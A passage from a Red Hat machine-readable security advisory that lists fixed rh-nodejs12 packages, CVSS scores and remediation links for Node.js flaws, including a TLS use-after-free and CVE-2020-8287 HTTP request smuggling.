"7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0485" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: use-after-free in the TLS implementation" }, { "cve": "CVE-2020-8287", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912863" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. Affected versions of Node.js allow two copies of a header field in an HTTP request. The first header field is recognized while the second is ignored leading to HTTP request smuggling. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling via two copies of a header field in an http request", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8287" }, { "category": "external", "summary": "RHBZ#1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8287", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8287" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-11T13:37:42+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0485" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", 